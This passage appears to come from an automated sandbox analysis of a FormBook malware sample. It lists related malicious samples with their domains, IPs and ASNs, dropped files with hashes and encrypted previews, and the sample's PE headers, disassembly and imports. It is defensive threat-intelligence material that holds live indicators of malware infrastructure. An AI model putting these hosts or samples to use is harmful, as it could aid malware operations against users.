	KSts9xW7qy.exe	Get hash	malicious	FormBook	Browse	199.59.243.228
	DHL_734825510.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	Invoice 10493.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	SW_5724.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	199.59.243.227
www.rafconstrutora.online	8L6MBxaJ2m.exe	Get hash	malicious	FormBook	Browse	104.21.16.1
	1SxKeB4u0c.exe	Get hash	malicious	FormBook	Browse	104.21.48.1
	lgkWBwqY15.exe	Get hash	malicious	FormBook	Browse	104.21.34.103
	New quotation request.exe	Get hash	malicious	FormBook	Browse	104.21.34.103
	PO 4110007694.exe	Get hash	malicious	FormBook	Browse	104.21.34.103
	attached invoice.exe	Get hash	malicious	FormBook	Browse	172.67.159.24
	OUTSTANDING BALANCE PAYMENT.exe	Get hash	malicious	FormBook	Browse	104.21.34.103
	DOC_114542366.vbe	Get hash	malicious	FormBook	Browse	172.67.159.24
	need quotations.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
www.windsky.click	ZcshRk2lgh.exe	Get hash	malicious	FormBook	Browse	46.253.5.221
	BcF3o0Egke.exe	Get hash	malicious	FormBook	Browse	46.253.5.221
	5CTbduoXq4.exe	Get hash	malicious	FormBook	Browse	46.253.5.221
	file.exe	Get hash	malicious	FormBook	Browse	46.253.5.221
fap-a13f5c64.faipod.com	AxKxwW9WGa.exe	Get hash	malicious	FormBook	Browse	165.154.96.210
	tfWjjV1LdT.exe	Get hash	malicious	FormBook	Browse	165.154.96.210
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	165.154.96.210
www.mycleanupfiesta.live	FOTO#U011eRAFLAR.exe	Get hash	malicious	FormBook	Browse	172.67.137.238

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
BTEL-BG-ASBG	ZcshRk2lgh.exe	Get hash	malicious	FormBook	Browse	46.253.5.221
	BcF3o0Egke.exe	Get hash	malicious	FormBook	Browse	46.253.5.221
	5CTbduoXq4.exe	Get hash	malicious	FormBook	Browse	46.253.5.221
	file.exe	Get hash	malicious	FormBook	Browse	46.253.5.221
	jAjWw92QKR.exe	Get hash	malicious	AsyncRAT, PureLog Stealer	Browse	46.253.4.252
	SecuriteInfo.com.FileRepMalware.16004.4080.exe	Get hash	malicious	Unknown	Browse	95.169.204.138
	SecuriteInfo.com.Trojan.WinGo.Agent.27329.6060.exe	Get hash	malicious	Unknown	Browse	95.169.204.138
	file.exe	Get hash	malicious	GCleaner, Raccoon Stealer v2	Browse	95.169.205.186
	xzQ4Zf3975.exe	Get hash	malicious	Raccoon Stealer v2	Browse	95.169.205.186
	60lAWJYfsL.exe	Get hash	malicious	Raccoon Stealer v2	Browse	95.169.205.186
LINKNET-ID-APLinknetASNID	z6tNjJC614.exe	Get hash	malicious	FormBook	Browse	103.21.221.87
	ZcshRk2lgh.exe	Get hash	malicious	FormBook	Browse	103.21.221.4
	BcF3o0Egke.exe	Get hash	malicious	FormBook	Browse	103.21.221.4
	aBEh0fsi2c.exe	Get hash	malicious	FormBook	Browse	103.21.221.87
	sora.mpsl.elf	Get hash	malicious	Unknown	Browse	139.10.29.3
	arm4.elf	Get hash	malicious	Mirai	Browse	139.44.142.78
	momo.arm7.elf	Get hash	malicious	Mirai	Browse	139.41.98.162
	armv5l.elf	Get hash	malicious	Mirai	Browse	139.34.88.220
	DEMONS.ppc.elf	Get hash	malicious	Unknown	Browse	139.16.152.234
	loligang.arm.elf	Get hash	malicious	Mirai	Browse	139.10.78.207
MULTIBAND-NEWHOPEUS	BDlwy8b7Km.exe	Get hash	malicious	FormBook	Browse	209.74.79.41
	wSoShbuXnJ.exe	Get hash	malicious	FormBook	Browse	209.74.79.42
	4p5XLVXJnq.exe	Get hash	malicious	FormBook	Browse	209.74.79.40
	BLv4mI7zzY.exe	Get hash	malicious	FormBook	Browse	209.74.79.40
	SLq0ulC3Wf.exe	Get hash	malicious	FormBook	Browse	209.74.79.40
	ZcshRk2lgh.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
	ydJaT4b5N8.exe	Get hash	malicious	FormBook	Browse	209.74.79.42
	BalphRTkPS.exe	Get hash	malicious	FormBook	Browse	209.74.77.107
	02Eh1ah35H.exe	Get hash	malicious	FormBook, GuLoader	Browse	209.74.77.109
	suBpo1g13Q.exe	Get hash	malicious	FormBook	Browse	209.74.77.109
INTERHOPCA	AxKxwW9WGa.exe	Get hash	malicious	FormBook	Browse	165.154.96.210
	tfWjjV1LdT.exe	Get hash	malicious	FormBook	Browse	165.154.96.210
	M7XS5C07kV.exe	Get hash	malicious	FormBook	Browse	165.154.96.210
	arm4.elf	Get hash	malicious	Mirai	Browse	165.154.119.54
	i686.elf	Get hash	malicious	Mirai	Browse	165.154.144.14
	la.bot.powerpc.elf	Get hash	malicious	Unknown	Browse	165.154.119.65
	sh4.elf	Get hash	malicious	Mirai	Browse	165.154.120.14
	https://mj.ostep.net/acknowledgements	Get hash	malicious	Unknown	Browse	165.154.182.38
	firmware.mipsel.elf	Get hash	malicious	Unknown	Browse	165.154.232.175
	http://www771771u.com/	Get hash	malicious	Unknown	Browse	165.154.224.29

Process:	C:\Windows\SysWOW64\chkdsk.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autC43F.tmp

Download File

Process:	C:\Users\user\Desktop\bIcqeSVPW6.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.99530839611291
Encrypted:	true
SSDEEP:	6144:NH/lJPElxqx4FJ9ip+pD2E4+XodgHUWkJfuJn2QVZOA:NflJ/x8IWD2T2BM+2CUA
MD5:	2974F52FA376A2120CB2000256ECADD8
SHA1:	8B107CEB7947555D6851ED7D4DF30277BDF41C70
SHA-256:	02D2F1994C27094B7D7DB911DE9313A7B6A10E4F8E559A13DD3E8408E8014CB0
SHA-512:	46837A8E7D6108CDF5D7B7694B638B9B8AAFED56BE14F11CC8A17AB316F4C807CB8A8FDD23F9049AFE5FD56BD33708E2AE3263D833D4791FFAEB9BC6F99CAEE2
Malicious:	false
Reputation:	low
Preview:	...6VYIH3DV4..EO.HBATT6U.IH7DV413EOSHBATT6UYIH7DV413EOSHBATT.UYIF(.X4.:.n.I..u.^<*i8E+1FP^e,2&,. tT0y;=Yd?Z.w..s%-%1z;XSmH7DV413<NZ..!3..5>.uW#.....u3/.[...i9..-....S"..!!)i4Q.YIH7DV41c.OS.C@T_...IH7DV413.OQII@_T6.]IH7DV413E.@HBADT6U)MH7D.41#EOSJBART6UYIH7BV413EOSH2ETT4UYIH7DT4q.EOCHBQTT6UIIH'DV413E_SHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413k;606ATTB.]IH'DV4e7EOCHBATT6UYIH7DV4.3E/SHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV4

C:\Users\user\AppData\Local\Temp\cunili

Download File

Process:	C:\Users\user\Desktop\bIcqeSVPW6.exe
File Type:	data
Category:	dropped
Size (bytes):	288256
Entropy (8bit):	7.99530839611291
Encrypted:	true
SSDEEP:	6144:NH/lJPElxqx4FJ9ip+pD2E4+XodgHUWkJfuJn2QVZOA:NflJ/x8IWD2T2BM+2CUA
MD5:	2974F52FA376A2120CB2000256ECADD8
SHA1:	8B107CEB7947555D6851ED7D4DF30277BDF41C70
SHA-256:	02D2F1994C27094B7D7DB911DE9313A7B6A10E4F8E559A13DD3E8408E8014CB0
SHA-512:	46837A8E7D6108CDF5D7B7694B638B9B8AAFED56BE14F11CC8A17AB316F4C807CB8A8FDD23F9049AFE5FD56BD33708E2AE3263D833D4791FFAEB9BC6F99CAEE2
Malicious:	false
Preview:	...6VYIH3DV4..EO.HBATT6U.IH7DV413EOSHBATT6UYIH7DV413EOSHBATT.UYIF(.X4.:.n.I..u.^<*i8E+1FP^e,2&,. tT0y;=Yd?Z.w..s%-%1z;XSmH7DV413<NZ..!3..5>.uW#.....u3/.[...i9..-....S"..!!)i4Q.YIH7DV41c.OS.C@T_...IH7DV413.OQII@_T6.]IH7DV413E.@HBADT6U)MH7D.41#EOSJBART6UYIH7BV413EOSH2ETT4UYIH7DT4q.EOCHBQTT6UIIH'DV413E_SHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413k;606ATTB.]IH'DV4e7EOCHBATT6UYIH7DV4.3E/SHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV413EOSHBATT6UYIH7DV4

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.157587968695982
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	bIcqeSVPW6.exe
File size:	1'224'192 bytes
MD5:	eeb8a8cd64ecc9e96b0c4cde2072681c
SHA1:	13fde96c3b53d115585c339da5595741cfddc1df
SHA256:	27bc352c485ac59da456735b5418f08abd0d606ef69e4b18b4a720fe9074b1e7
SHA512:	309f82ebc80597d59f7ec57d495867123e0d33f7b92898ef74a3c85b51a9530b482065bd16b9ab515ed1c7e15e60f2d2093b43b9f715bf5199ba1c1f3424fb37
SSDEEP:	24576:3tb20pkaCqT5TBWgNQ7aTHtw/DX/196A:0Vg5tQ7aTHUDPz5
TLSH:	FD45DF2373DDC361C3B25273BA267741AE7F782506A1F56B2FD8093DE920122525EA73
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x6748FCA8 [Thu Nov 28 23:28:40 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007F7A90643E1Fh
jmp 00007F7A90636E34h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F7A90636FBAh
cmp edi, eax
jc 00007F7A9063731Eh
bt dword ptr [004C0158h], 01h
jnc 00007F7A90636FB9h
rep movsb
jmp 00007F7A906372CCh
cmp ecx, 00000080h
jc 00007F7A90637184h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F7A90636FC0h
bt dword ptr [004BA370h], 01h
jc 00007F7A90637490h
bt dword ptr [004C0158h], 00000000h
jnc 00007F7A9063715Dh
test edi, 00000003h
jne 00007F7A9063716Eh
test esi, 00000003h
jne 00007F7A9063714Dh
bt edi, 02h
jnc 00007F7A90636FBFh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F7A90636FC3h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F7A90637015h
bt esi, 03h
jnc 00007F7A90637068h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x61d64	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x126000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x61d64	0x61e00	05fa54556c32a8dc301f408c1b2e52e3	False	0.9331672054597702	data	7.90470460187494	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x126000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x5906b	data			1.0003318241277277
RT_GROUP_ICON	0x125824	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x12589c	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x1258b0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x1258c4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x1258d8	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x1259b4	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, RaiseException, InitializeCriticalSectionAndSpinCount, InterlockedDecrement, InterlockedIncrement, CreateThread, DuplicateHandle, EnterCriticalSection, GetCurrentProcess, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, HeapSize, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, SetFilePointer, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, HeapReAlloc, WriteConsoleW, SetEndOfFile, DeleteFileW, SetEnvironmentVariableA
USER32.dll	SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, DrawMenuBar, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, MonitorFromRect, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, CopyImage, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, UnregisterHotKey, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
